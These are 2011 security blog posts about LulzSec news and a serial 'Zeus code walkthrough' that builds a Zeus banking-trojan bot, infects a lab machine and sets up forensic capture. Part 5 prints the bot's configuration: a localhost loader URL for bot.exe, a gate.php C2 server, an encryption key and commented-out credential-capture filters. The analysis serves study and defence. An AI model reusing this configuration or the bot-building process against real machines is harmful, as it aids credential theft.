Irregular Expressions

June 26, 2011  1:32 AM

lulz releases

Posted by: Dan O'Connor

In case you ever want them, here is the PB releases for lulzsecurity. This should be everything.

I just don’t have the motivation to download.

June 26, 2011  1:08 AM

Lulz update

Posted by: Dan O'Connor

Looks like they have packed it in, they released a 50th day anni torrent and locked the door on the way out.

Does it mean they are gone?

Who really knows.

I would like to know more why they left.

I hope its the people that were tracking them down and just maybe one of them go pinched. But I think that is wishful thinking.

I am assuming we will get more details in a few more days, but it may have been a little bit of from both sides.

It’s been a crazy 50 days, I have been following lulz since just before the first release, and if anything they did bring out the lulz.

June 25, 2011  12:29 AM

Zeus code walkthrough – Part 8

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

Our last bit we need before we hit the big red button and infect the machine is getting wireshark ready to go.

I have wireshark loaded with a filter string to only capture traffic from the workstation that I will infect.

I have the workstation infected now, and I can see the traffic coming back to the server on port 80 to the web server we setup.  The infected workstation is talking to the gate.php file on the web server, as expected it’s encrypted.  This will be the first php file we dive in to, it should be a great start.

June 24, 2011  12:46 AM


Posted by: Dan O'Connor

Has been in top form the last few posts, start here and work your way back.

I promise I will continue with the Zeus stuff when I get some more sleep.

June 24, 2011  12:44 AM


Posted by: Dan O'Connor

I like the key table at the bottom and how a “slashdotter” would react..

June 24, 2011  12:40 AM

Firesheep in action

Posted by: Dan O'Connor

From CNN of all places…

I wrote about his way way back.

June 23, 2011  11:45 PM

What I have been following

Posted by: Dan O'Connor
lulzsecexposed, lulzsecurity, the jester

For the last few weeks I have not been doing a whole bunch.  I have really just been following these guys.!/lulzsec

You may know who lulsec is, but the other two might be a stretch if you have not been following that closely.

The Jester (th3j35st3r) is actively hunting lulzsec, his last few blog posts are well worth reading.

lulzsecexposed is also doing the same but has release slightly different information.

June 22, 2011  12:12 AM

Zeus code walkthrough – Part 7

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

In case you are following at home you will need to go download the following;

- WireShark

- RegShot

Then something to do the disk, process and memory image. I will be using Helix Pro, mainly because I have a copy.  There is several other options available to do this.

You can get Helix Pro here,

First order of business is to take a snapshot of the registry with RegShot.  Next will be the raw disk image and process / volatile data information using Helix.  I have setup a receiving server and will capturing the disk and memory over the network, then the pdf for the volatile data will be saved.

June 21, 2011  11:55 PM

Zeus code walkthrough – Part 6

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

I am just at the point where I am ready to take our bot we built and see if we can get it to run on the target machine.  But I want to make sure we are going to collect every little thing we can.

What we are going to setup to do is the following.

  1. Capture network traffic with a sniffer, I have wireshark already on the server so it will do fine.
  2. Take a registry snapshot of the target machine.
  3. Raw disk image of the target machine.
  4. Finally process and memory snapshots.
The traffic is encrypted but capturing it will give a starting point.  The registry, raw disk and process snapshots will be compared before and after infection.

June 11, 2011  11:20 PM

Zeus code walkthrough – Part 5

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

After the fact of building my bot, it’s worth looking at what the basic config file looks like.

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "http://localhost/config.bin"
  remove_certs 1
  disable_tcpserver 0
  encryption_key "secret key"

entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
  entry "WebFilters"
  entry "WebDataFilters"
    ;"*" "passw;login"
  entry "WebFakes"
    ;"" "" "GP" "" ""

At this point we know what the encryption key, url_config, url_loader and url_server is.  The rest will have to be tracked back in the source code when we get there.

I am very interested in the webFakes listing.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: